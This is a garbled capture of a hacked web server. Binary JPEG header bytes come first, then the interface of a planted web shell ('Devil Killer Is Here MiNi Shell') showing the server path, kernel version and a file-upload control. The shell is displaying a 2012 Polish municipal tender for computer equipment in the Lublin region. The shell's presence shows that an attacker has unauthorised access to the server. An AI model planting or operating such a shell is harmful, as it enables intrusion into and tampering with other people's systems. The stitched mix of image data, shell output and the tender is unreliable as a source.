JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120809/294980-N-2012.html

<p class="kh_header"><b>Mełgiew: dostawa sprzętu komputerowego i oprogramowania w ramach projektu pn. MARKA LOKALNA SZANSĄ ROZWOJU PRZEDSIĘBIORCZOŚCI NA SZLACHECKIM SZLAKU W WOJEWÓDZTWIE LUBELSKIM realizowanego w ramach Szwajcarsko-Polskiego Programu Współpracy, składająca się z 6 niezależnych części.</b><br>
<b>Numer ogłoszenia: 294980 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mełgiew , ul. Partyzancka 2, 21-007 Mełgiew, woj. lubelskie, tel. 081 759 77 01, 02, 03, faks 081 759 77 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> melgiew@melgiew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa sprzętu komputerowego i oprogramowania w ramach projektu pn. MARKA LOKALNA SZANSĄ ROZWOJU PRZEDSIĘBIORCZOŚCI NA SZLACHECKIM SZLAKU W WOJEWÓDZTWIE LUBELSKIM realizowanego w ramach Szwajcarsko-Polskiego Programu Współpracy, składająca się z 6 niezależnych części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -	Przedmiotem zamówienia jest dostawa sprzętu komputerowego i oprogramowania w ramach projektu pn. MARKA LOKALNA SZANSĄ ROZWOJU PRZEDSIĘBIORCZOŚCI NA SZLACHECKIM SZLAKU W WOJEWÓDZTWIE LUBELSKIM realizowanego w ramach Szwajcarsko-Polskiego Programu Współpracy, składająca się z 6 niezależnych części.

-               Przedmiot zamówienia zostanie dostarczony dla 6 gmin partnerskich oraz Funduszu Lokalnego im. Jana III Sobieskiego realizujących projekt pn. MARKA LOKALNA SZANSĄ ROZWOJU PRZEDSIĘBIORCZOŚCI NA SZLACHECKIM SZLAKU W WOJEWÓDZTWIE LUBELSKIM, zgodnie z poniższym podziałem na części:

1.	Część I 
a)	Gmina Mełgiew miejsce dostawy:  Urząd Gminy Mełgiew - ul. Partyzancka 2, 21-007 Mełgiew,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 5 sztuk
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Kamera cyfrowa - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Komputer stacjonarny - 1 sztuka
-	Monitor LCD - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 6 sztuk

2.	Część II
a)	Gmina Rybczewice oraz Gmina Gorzków miejsce dostawy: Urząd Gminy Rybczewice - Rybczewice Drugie 119, 21-065 Rybczewice,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu A - 1 sztuka
-	Komputer przenośny typu B - 4 sztuka
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu A - 1 sztuka
-	Urządzenie wielofunkcyjne typu B - 1 sztuka
-	Aparat fotograficzny typu A - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 5 sztuk
-	Oprogramowanie - CorelDRAW Graphic Suite X6 lub równoważny pod względem funkcjonalności - 1 sztuka

3.	Część III
a)	Gmina Piaski miejsce dostawy: Urząd Gminy Piaski - ul. Lubelska 77, 21-050 Piaski,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 4 sztuki
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 4 sztuki

4.	Część IV
a)	Gmina Spiczyn miejsce dostawy: Urząd Gminy Spiczyn - Spiczyn 10c, 21-077 Spiczyn,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 5 sztuk
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 5 sztuk

5.	Część V
a)	Gmina Wólka miejsce dostawy: Urząd Gminy Wólka - Jakubowice Murowane 8, 20-258 Lublin,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 5 sztuk
-	Projektor multimedialny - 2 sztuki
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Drukarka - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 2 sztuki
-	Komplet kolumn - 2 sztuki
-	Oprogramowanie - pakiety biurowe - 5 sztuk

6.	Część VI
a)	Fundusz Lokalny im. Jana III Sobieskiego miejsce dostawy: Urząd Gminy Mełgiew - ul. Partyzancka 2, 21-007 Mełgiew,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 6 sztuk
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 6 sztuk


-	Szczegółowy opis parametrów zamawianych urządzeń stanowi załącznik nr 10 do SIWZ.

-	Wykonawca udzieli gwarancji na dostarczony sprzęt, co najmniej na ogólnych warunkach określonych przez ich producentów. Do dostarczanego towaru objętego gwarancją wykonawca obowiązany jest załączyć wszelkie niezbędne dokumenty gwarancyjne. 

-	Wykonawca zobowiązany jest do jednoznacznego określenia zaoferowanych w ofercie produktów, charakteryzując je poprzez wskazanie na konkretny wyrób (nazwanie, określenie marki, znak towarowego lub innych przypisanych wyłącznie temu produktowi cech)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.31.00-6, 30.21.30.00-5, 30.12.14.10-0, 38.65.10.00-3, 38.65.16.00-9, 48.00.00.00-8, 48.62.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>część I:
- za spełniających warunek udziału w postępowaniu zamawiający uzna wykonawców, którzy wykażą, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie wykonali co najmniej jedną dostawę sprzętu komputerowego i oprogramowania o wartości min.  20 000 zł brutto,
Część II:
- za spełniających warunek udziału w postępowaniu zamawiający uzna wykonawców, którzy wykażą, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie wykonali co najmniej jedną dostawę sprzętu komputerowego i oprogramowania o wartości min.  20 000 zł brutto,
Część III:
- za spełniających warunek udziału w postępowaniu zamawiający uzna wykonawców, którzy wykażą, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie wykonali co najmniej jedną dostawę sprzętu komputerowego i oprogramowania o wartości min.  20 000 zł brutto,
Część IV:
- za spełniających warunek udziału w postępowaniu zamawiający uzna wykonawców, którzy wykażą, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie wykonali co najmniej jedną dostawę sprzętu komputerowego i oprogramowania o wartości min. 20 000 zł brutto,
Część V:
- za spełniających warunek udziału w postępowaniu zamawiający uzna wykonawców, którzy wykażą, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie wykonali co najmniej jedną dostawę sprzętu komputerowego i oprogramowania o wartości min. 20 000 zł brutto,
Część VI:
- za spełniających warunek udziału w postępowaniu zamawiający uzna wykonawców, którzy wykażą, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie wykonali co najmniej jedną dostawę sprzętu komputerowego i oprogramowania o wartości min.  20 000 zł brutto,

* Jeżeli wykonawca będzie składał ofertę na kilka części, powinien wykazać się wykonaniem dostawy, obejmującej sumę wartości dostaw wymaganych dla poszczególnych części, na które wykonawca składa ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, Wykonawca zobowiązany jest złożyć wraz z ofertą niżej wymienione oświadczenia i dokumenty:
a)	specyfikację techniczną oferowanego wyrobu wg formularza stanowiącego załącznik nr 1 (a/b/c/d/e/f) do SIWZ, specyfikację składa się w formie oryginału, odpowiednio dla części, na którą wykonawca składa ofertę (wykonawca obowiązany jest uzupełnić wszystkie pozycje w formularzu specyfikacji technicznej dla oferowanego wyrobu, w sytuacji gdy wykonawca oferuje wartość parametru identyczną z minimalną wartością parametru wskazaną przez Zamawiającego, obowiązany jest również do jej wskazania w odpowiedniej pozycji).
 
	* Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:
a)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
b)	w przypadku złożenia oferty wspólnej każdy z Wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1 oraz brak podstaw do wykluczenia z niniejszego postępowania o udzielenie zamówienia w okolicznościach określonych  w art. 24 ust. 1 ustawy; wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie;
Wspólników spółki cywilnej traktuje się jak Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), dlatego muszą oni spełniać wymagania określone w niniejszym punkcie.
	* Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli Wykonawca,  wykazując spełnienie warunków, o którym mowa w art. 22 ust. 1 ustawy Pzp, polega  na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów ww. dokumentów wykazujących brak podstaw do wykluczenia  z postępowania o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający przewiduje zmiany umowy w sytuacjach, których nie można było przewidzieć w dniu podpisania umowy, w szczególności dotyczące:
1)	zmiany jakości lub innych parametrów wyrobów zaoferowanych w ofercie, przy czym zmiana taka może być spowodowana:
a)	Niedostępności na rynku wyrobów wskazanych w ofercie wynikających z zaprzestania produkcji lub wycofaniem z rynku tych wyrobów,
b)	Pojawieniem się na rynku wyrobów nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji przedmiotu umowy,
c)	Pojawieniem się na rynku wyrobów o lepszych parametrach niż wskazane w ofercie, pod warunkiem, że zmiany wskazane powyżej nie spowodują zwiększenia ceny ofertowej.
2)	Ograniczenia zakresu dostawy objętego umową w przypadku stwierdzenia braku konieczności wykonywania pierwotnie przyjętego zakresu zamówienia,
3)	Zmiany wysokości wynagrodzenia w przypadku:
a)	Ograniczenia zakresu dostawy, o którym mowa w pkt 2,
b)	Zmiany ceny w wyniku zmiany obowiązującej stawki VAT,
4)	Zmiany terminu dostawy z przyczyn niezależnych od Wykonawcy ani Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.melgiew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
Mełgiew ul. Partyzancka 2, 21-007 Mełgiew- pokój 312..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:30, miejsce: Gmina Mełgiew ul. Partyzancka 2, 21-007 Mełgiew pok. 104 (kancelaria Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany w ramach Szwajcarsko- Polskiego Programu Współpracy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GMINA MEŁGIEW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Gmina Mełgiew miejsce dostawy:  Urząd Gminy Mełgiew - ul. Partyzancka 2, 21-007 Mełgiew,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 5 sztuk
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Kamera cyfrowa - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Komputer stacjonarny - 1 sztuka
-	Monitor LCD - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 6 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.31.00-6, 30.21.30.00-5, 30.12.14.10-0, 38.65.10.00-3, 38.65.16.00-9, 48.00.00.00-8, 48.62.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> GMINA RYBCZEWICE ORAZ GMINA GORZKÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Gmina Rybczewice oraz Gmina Gorzków miejsce dostawy: Urząd Gminy Rybczewice - Rybczewice Drugie 119, 21-065 Rybczewice,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu A - 1 sztuka
-	Komputer przenośny typu B - 4 sztuka
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu A - 1 sztuka
-	Urządzenie wielofunkcyjne typu B - 1 sztuka
-	Aparat fotograficzny typu A - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 5 sztuk
-	Oprogramowanie - CorelDRAW Graphic Suite X6 lub równoważny pod względem funkcjonalności - 1 sztuka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.31.00-6, 30.21.30.00-5, 30.12.14.10-0, 38.65.10.00-3, 38.65.16.00-9, 48.00.00.00-8, 48.62.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> GMINA PIASKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Gmina Piaski miejsce dostawy: Urząd Gminy Piaski - ul. Lubelska 77, 21-050 Piaski,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 4 sztuki
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 4 sztuki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.31.00-6, 30.21.30.00-5, 30.12.14.10-0, 38.65.10.00-3, 38.65.16.00-9, 48.00.00.00-8, 48.62.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> GMINA SPICZYN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Gmina Spiczyn miejsce dostawy: Urząd Gminy Spiczyn - Spiczyn 10c, 21-077 Spiczyn,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 5 sztuk
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 5 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.31.00-6, 30.21.30.00-5, 30.12.14.10-0, 38.65.10.00-3, 38.65.16.00-9, 48.00.00.00-8, 48.62.00.00-0.</p></li>
